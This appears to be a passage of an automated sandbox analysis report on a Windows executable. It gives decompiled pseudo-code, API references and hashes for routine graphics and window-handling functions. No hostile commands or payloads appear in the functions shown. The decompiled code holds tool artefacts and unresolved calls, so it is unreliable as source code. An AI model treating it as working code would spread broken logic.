Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

GetMonitorInfoA, xrefs: 004275B0
DISPLAY, xrefs: 00427631

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: 6b745dedefc078b3f07a6590a1babe7185af016361bbaa0b1ba7209f26baa8cc
Instruction ID: 8e8e86ab010541f17aa2f2fa631026a53dbcdc8c02397220a03315d45d02f7d6
Opcode Fuzzy Hash: 6b745dedefc078b3f07a6590a1babe7185af016361bbaa0b1ba7209f26baa8cc
Instruction Fuzzy Hash: D211D232705B20AED730CF65AC44BA7B7A9EB15724F40453BEC0AA7640D3B4A800CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 004238C4, Relevance: 10.6, APIs: 7, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004238C4(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L5:
					return _t16;
				} else {
					_t16 = E00421290(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L5;
					} else {
						_push(0);
						L00406EA4();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00406AE4();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x423973);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x42397a);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00407114();
						return _t31;
					}
				}
			}

0x004238c4
0x004238c5
0x004238c7
0x004238cf
0x004238d2
0x004238d6
0x0042397a
0x0042397f
0x004238e7
0x004238f5
0x004238fa
0x004238fe
0x00000000
0x00423900
0x00423900
0x00423902
0x00423907
0x0042390a
0x0042390d
0x0042390e
0x00423913
0x00423920
0x00423925
0x00423926
0x0042392b
0x0042392e
0x0042393f
0x00423946
0x00423949
0x0042394c
0x00423959
0x00423962
0x00423967
0x0042396a
0x0042396b
0x0042396d
0x00423972
0x00423972
0x004238fe

APIs

Part of subcall function 00421290: GetObjectA.GDI32(00000000,00000004), ref: 004212A7
Part of subcall function 00421290: 72E7AEA0.GDI32(00000000,00000000,?,00000028,00000000,00000004,?,000000FF,00000000,00000018,00000000,00423BCE,00000000,00423D24,?,00000000), ref: 004212CA

72E7AC50.USER32(00000000), ref: 00423902
72E7A590.GDI32(?,00000000), ref: 0042390E
SelectObject.GDI32(?), ref: 0042391B
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00423973,?,?,?,?,00000000), ref: 0042393F
SelectObject.GDI32(?,?), ref: 00423959
DeleteDC.GDI32(?), ref: 00423962
72E7B380.USER32(00000000,?,?,?,?,0042397A,?,00000000,00423973,?,?,?,?,00000000), ref: 0042396D

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$A590B380ColorDeleteTable
String ID:
API String ID: 980243606-0
Opcode ID: fdffc89f9bf17007cdbeb81672fd9c93577e77287074e513d4ba16e13166d89f
Instruction ID: 667baed9180a13e4194034e7c5b6ddee86044931335147c1621752bc5a4629d1
Opcode Fuzzy Hash: fdffc89f9bf17007cdbeb81672fd9c93577e77287074e513d4ba16e13166d89f
Instruction Fuzzy Hash: 43119AB1E042196BDB10EFE5DC41AAEB3FCEB08704F4144BAF504E7281D6789E508758

Uniqueness

Uniqueness Score: -1.00%

Function 0045369C, Relevance: 10.6, APIs: 7, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0045369C(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E00453674(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E00407274(SendMessageA(_t27, 0x84, 0, E004072FC(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}

0x0045369c
0x0045369c
0x004536a0
0x004536a3
0x004536a5
0x004536ab
0x00453720
0x00453720
0x004536ad
0x004536ad
0x004536b4
0x00453710
0x0045371b
0x00000000
0x004536b6
0x004536b7
0x004536bc
0x004536c9
0x004536cd
0x00000000
0x004536cf
0x004536d2
0x004536e0
0x00000000
0x004536e2
0x00453709
0x00453709
0x004536e0
0x004536cd
0x004536b4
0x00453729

APIs

GetCursorPos.USER32 ref: 004536B7
WindowFromPoint.USER32(?,?), ref: 004536C4
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004536D2
GetCurrentThreadId.KERNEL32 ref: 004536D9
SendMessageA.USER32 ref: 004536F2
SendMessageA.USER32 ref: 00453709
SetCursor.USER32(00000000), ref: 0045371B

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: b5d7de7c1deb21329f82a5cd8529cecc2afe6e149f4171b84b68cc7cd1c67b3b
Instruction ID: 54b035ec9656a43d8e6ff755461e91d3997496fb98433e198fb73bd70917e05c
Opcode Fuzzy Hash: b5d7de7c1deb21329f82a5cd8529cecc2afe6e149f4171b84b68cc7cd1c67b3b
Instruction Fuzzy Hash: C901D872A0820025D6203E754C86B3F2958CF85B96F10407FB904BA2C3EA3EAC05526E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C40C, Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040C40C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t44;
				signed int _t49;
				signed short* _t56;
				char* _t58;
				void* _t64;
				intOrPtr* _t69;
				signed short* _t76;
				signed short* _t79;
				intOrPtr _t88;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t102;
				void* _t106;
				intOrPtr _t107;
				char* _t108;
				void* _t109;

				_v780 = __ecx;
				_v776 = __eax;
				_t44 =  *((intOrPtr*)(__edx));
				_t97 = _t44 & 0x00000fff;
				if((_t44 & 0x00000fff) != 0xc) {
					_push(__edx);
					_t88 = _v776;
					_push(_t88);
					L0040C108();
					return _t88;
				}
				if((_t44 & 0x00000040) == 0) {
					_v792 =  *((intOrPtr*)(__edx + 8));
				} else {
					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
				}
				_v788 =  *_v792 & 0x0000ffff;
				_t90 = _v788 - 1;
				if(_t90 >= 0) {
					_t94 = _t90 + 1;
					_t106 = 0;
					_t108 =  &_v772;
					do {
						_v804 = _t108;
						_push(_v804 + 4);
						_t16 = _t106 + 1; // 0x1
						_t76 = _v792;
						_push(_t76);
						L0040C130();
						if(_t76 != 0) {
							E004028B0(0x14);
						}
						_push( &_v784);
						_t19 = _t106 + 1; // 0x1
						_t79 = _v792;
						_push(_t79);
						L0040C138();
						if(_t79 != 0) {
							E004028B0(0x14);
						}
						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
						_t106 = _t106 + 1;
						_t108 = _t108 + 8;
						_t94 = _t94 - 1;
					} while (_t94 != 0);
				}
				_push( &_v772);
				_t49 = _v788;
				_push(_t49);
				_push(0xc);
				L0040C120();
				_t107 = _t49;
				if(_t107 == 0) {
					E004028B0(0x12);
				}
				E0040C2CC(_v776, _t97);
				 *_v776 = 0x200c;
				 *((intOrPtr*)(_v776 + 8)) = _t107;
				_t92 = _v788 - 1;
				if(_t92 >= 0) {
					_t93 = _t92 + 1;
					_t69 =  &_v768;
					_t102 =  &_v260;
					do {
						 *_t102 =  *_t69;
						_t102 = _t102 + 4;
						_t69 = _t69 + 8;
						_t93 = _t93 - 1;
					} while (_t93 != 0);
					do {
						goto L17;
					} while (_t64 != 0);
					return _t64;
				}
				L17:
				_push( &_v796);
				_push( &_v260);
				_t56 = _v792;
				_push(_t56);
				L0040C150();
				if(_t56 != 0) {
					E004028B0(0x14);
				}
				_push( &_v800);
				_t58 =  &_v260;
				_push(_t58);
				_push(_t107);
				L0040C150();
				if(_t58 != 0) {
					E004028B0(0x14);
				}
				_v780();
				_t64 = E0040C3B0(_v788 - 1, _t109);
			}

0x0040c418
0x0040c41e
0x0040c424
0x0040c429
0x0040c432
0x0040c434
0x0040c435
0x0040c43b
0x0040c43c
0x00000000
0x0040c43c
0x0040c449
0x0040c45b
0x0040c44b
0x0040c450
0x0040c450
0x0040c46a
0x0040c476
0x0040c479
0x0040c47b
0x0040c47c
0x0040c47e
0x0040c484
0x0040c486
0x0040c495
0x0040c496
0x0040c49a
0x0040c4a0
0x0040c4a1
0x0040c4a8
0x0040c4ac
0x0040c4ac
0x0040c4b7
0x0040c4b8
0x0040c4bc
0x0040c4c2
0x0040c4c3
0x0040c4ca
0x0040c4ce
0x0040c4ce
0x0040c4e9
0x0040c4eb
0x0040c4ec
0x0040c4ef
0x0040c4ef
0x0040c484
0x0040c4f8
0x0040c4f9
0x0040c4ff
0x0040c500
0x0040c502
0x0040c507
0x0040c50b
0x0040c50f
0x0040c50f
0x0040c51a
0x0040c525
0x0040c530
0x0040c539
0x0040c53c
0x0040c53e
0x0040c53f
0x0040c545
0x0040c54b
0x0040c54d
0x0040c54f
0x0040c552
0x0040c555
0x0040c555
0x0040c558
0x00000000
0x00000000
0x0040c5c8
0x0040c5c8
0x0040c558
0x0040c55e
0x0040c565
0x0040c566
0x0040c56c
0x0040c56d
0x0040c574
0x0040c578
0x0040c578
0x0040c583
0x0040c584
0x0040c58a
0x0040c58b
0x0040c58c
0x0040c593
0x0040c597
0x0040c597
0x0040c5aa
0x0040c5b8

APIs

VariantCopy.OLEAUT32(?), ref: 0040C43C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C4A1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C4C3
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C502
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C56D
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C58C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction ID: 53c8fa50fa3af74e803547065bbe6c49ea8385ed887272acae8b06600fc0eaa4
Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction Fuzzy Hash: BB51E2759011299BDB22DB59CDD0ADAB3BCBF08304F0042EAE649E7381D674AF818F65

Uniqueness

Uniqueness Score: -1.00%

Function 0042153C, Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042153C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E004083C4(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x421833, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00406EA4();
				_v44 = _t36;
				if(_v44 == 0) {
					E00420A00(_t51);
				}
				_push(_t68);
				_push(0x421625);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00406B8C();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00406B8C();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042162C);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00407114();
				return _t43;
			}

0x0042153d
0x0042153f
0x00421545
0x00421548
0x0042154b
0x0042154e
0x00421557
0x00421562
0x00421570
0x00421576
0x0042157e
0x00421586
0x004215a3
0x004215a8
0x004215ad
0x00421588
0x00421592
0x00421596
0x0042159e
0x0042159e
0x004215b0
0x004215b2
0x004215b7
0x004215be
0x004215c0
0x004215c0
0x004215c7
0x004215c8
0x004215cd
0x004215d0
0x004215d3
0x004215d5
0x004215d8
0x004215d9
0x004215e0
0x004215e2
0x004215e5
0x004215e6
0x004215ef
0x004215f5
0x00421607
0x00421609
0x004215f7
0x004215f7
0x004215f7
0x0042160e
0x00421611
0x00421614
0x00421619
0x0042161c
0x0042161d
0x0042161f
0x00421624

APIs

GetSystemMetrics.USER32 ref: 0042158A
GetSystemMetrics.USER32 ref: 00421596
72E7AC50.USER32(00000000), ref: 004215B2
72E7AD70.GDI32(00000000,0000000E,00000000,00421625,?,00000000), ref: 004215D9
72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00421625,?,00000000), ref: 004215E6
72E7B380.USER32(00000000,00000000,0042162C,0000000E,00000000,00421625,?,00000000), ref: 0042161F

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$B380
String ID:
API String ID: 3145338429-0
Opcode ID: 041cace95e2c95455e02fd26e001397014c2dce48cd77e576c719cc50a5130e2
Instruction ID: 1e02ddd1ec2005f7b5f9bbc42ad3a6e0c9d41db1ceb18bddea3d27d6e7565a01
Opcode Fuzzy Hash: 041cace95e2c95455e02fd26e001397014c2dce48cd77e576c719cc50a5130e2
Instruction Fuzzy Hash: 7B317374A00214EFDB00DFA5D841AAEBBF5FF88714F54856AF815AB390C734AD40CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004219AC, Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E004219AC(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E0042185C(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L00406AE4();
				_v16 = 0;
				_push(_t46);
				_push(0x421a49);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00406C64();
					_v12 = _t29;
					_push(_v16);
					L00406C34();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00421A50);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00406C64();
				}
				return DeleteDC(_v16);
			}

0x004219b5
0x004219b9
0x004219c2
0x004219c9
0x004219cc
0x004219ce
0x004219d3
0x004219d8
0x004219d9
0x004219de
0x004219e1
0x004219e6
0x004219e8
0x004219ea
0x004219eb
0x004219ee
0x004219ef
0x004219f4
0x004219fa
0x004219fb
0x004219fb
0x00421a19
0x00421a1f
0x00421a22
0x00421a25
0x00421a2e
0x00421a30
0x00421a35
0x00421a39
0x00421a3a
0x00421a3a
0x00421a48

APIs

Part of subcall function 0042185C: GetObjectA.GDI32(?,00000054), ref: 00421870

72E7A590.GDI32(00000000), ref: 004219CE
72E7B410.GDI32(?,?,00000000,00000000,00421A49,?,00000000), ref: 004219EF
72E7B150.GDI32(?,?,?,00000000,00000000,00421A49,?,00000000), ref: 004219FB
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00421A12
72E7B410.GDI32(?,00000000,00000000,00421A50,00000000,?,?,?,00000000,00000000,00421A49,?,00000000), ref: 00421A3A
DeleteDC.GDI32(?), ref: 00421A43

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: B410$A590B150BitsDeleteObject
String ID:
API String ID: 3837315262-0
Opcode ID: 147e4cd242d4be9d281feb98c01640ca496c1b9021977b46c758e211fca80921
Instruction ID: 39db5832c03bedfee2225aaf3531bb04be9924a5546b3e83a7a5408937e5b18e
Opcode Fuzzy Hash: 147e4cd242d4be9d281feb98c01640ca496c1b9021977b46c758e211fca80921
Instruction Fuzzy Hash: CB118F75B04214BFDB10DBA9CC82F5EB7FCEB48700F51846AB518E7290D678A910CB28

Uniqueness

Uniqueness Score: -1.00%

Function 004329A0, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004329A0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x476900; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x476900; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x476900; // 0x0
				SetPropA(_a4,  *0x492b7a & 0x0000ffff, _t27);
				_t31 =  *0x476900; // 0x0
				SetPropA(_a4,  *0x492b78 & 0x0000ffff, _t31);
				_t35 =  *0x476900; // 0x0
				 *0x476900 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}

0x004329a5
0x004329a8
0x004329b0
0x004329b6
0x004329c8
0x004329dd
0x004329f8
0x004329f8
0x004329fd
0x00432a0f
0x00432a14
0x00432a26
0x00432a37
0x00432a3c
0x00432a4c
0x00432a54

APIs

SetWindowLongA.USER32 ref: 004329C8
GetWindowLongA.USER32 ref: 004329D3
GetWindowLongA.USER32 ref: 004329E5
SetWindowLongA.USER32 ref: 004329F8
SetPropA.USER32(?,00000000,00000000), ref: 00432A0F
SetPropA.USER32(?,00000000,00000000), ref: 00432A26

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 0716af0086cb08c84303f443826fada7a17ddc4a539cc45d37b1b88b3d6d2ae0
Instruction ID: abb13c6c5d5e2e5b8342f50275d9cd4f433c03c6d39adc140e830f34be4605c3
Opcode Fuzzy Hash: 0716af0086cb08c84303f443826fada7a17ddc4a539cc45d37b1b88b3d6d2ae0
Instruction Fuzzy Hash: BC111CB6504209BFCB40DF99DC84E9A3BECBB09354F108625FA18DB2A1D735E940DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004211EC, Relevance: 9.1, APIs: 6, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004211EC(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004029BC(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L00406AE4();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00421154(_t32) == 0) {
						E00420FE4( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00406B0C();
					_t31 = _t15;
				}
				return _t31;
			}

0x004211f7
0x004211f9
0x00421201
0x0042123b
0x00421249
0x00421203
0x00421203
0x00421205
0x0042120a
0x0042120e
0x00421227
0x0042122e
0x00421234
0x00421234
0x00421254
0x0042125c
0x00421272
0x00421272
0x00421277
0x00421279
0x0042127a
0x0042127f
0x0042127f
0x0042128c

APIs

72E7A590.GDI32(00000000,00000000,?,?,00424C53,?,?,?,?,0042375F,00000000,004237EB), ref: 00421205
SelectObject.GDI32(00000000,00000000), ref: 0042120E
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424C53,?,?,?,?,0042375F), ref: 00421222
SelectObject.GDI32(00000000,00000000), ref: 0042122E
DeleteDC.GDI32(00000000), ref: 00421234
72E7A8F0.GDI32(?,00000000,?,?,00424C53,?,?,?,?,0042375F,00000000,004237EB), ref: 0042127A

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$A590ColorDeleteTable
String ID:
API String ID: 1056449717-0
Opcode ID: b757113e1914b80df245d1b0cc6a716640e6c2ddefab822ddf1dfef8ab53b59c
Instruction ID: 0aa895c431452f674cf9a11a22d758fd895376930466322e03491361ff35dc2e
Opcode Fuzzy Hash: b757113e1914b80df245d1b0cc6a716640e6c2ddefab822ddf1dfef8ab53b59c
Instruction Fuzzy Hash: 9C01966130432066E624B76A9D47E6B76F89FC0758F01C82FB585F72D2E67D8844C36A

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE18, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045AE18(void* __eax) {
				struct tagRECT _v20;
				struct HWND__* _t18;
				void* _t29;
				RECT* _t30;

				_t29 = __eax;
				ValidateRect(E0043C1F4(__eax), 0);
				InvalidateRect(E0043C1F4(_t29), 0, 0xffffffff);
				GetClientRect(E0043C1F4(_t29), _t30);
				_t18 = E0043C1F4( *((intOrPtr*)(_t29 + 0x240)));
				MapWindowPoints(E0043C1F4(_t29), _t18,  &_v20, 2);
				ValidateRect(E0043C1F4( *((intOrPtr*)(_t29 + 0x240))), _t30);
				return InvalidateRect(E0043C1F4( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
			}

0x0045ae1c
0x0045ae28
0x0045ae39
0x0045ae47
0x0045ae59
0x0045ae67
0x0045ae79
0x0045ae9a

APIs

ValidateRect.USER32(00000000,00000000,0045B66C), ref: 0045AE28
InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045B66C), ref: 0045AE39
GetClientRect.USER32 ref: 0045AE47
MapWindowPoints.USER32 ref: 0045AE67
ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045B66C), ref: 0045AE79
InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045AE91

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
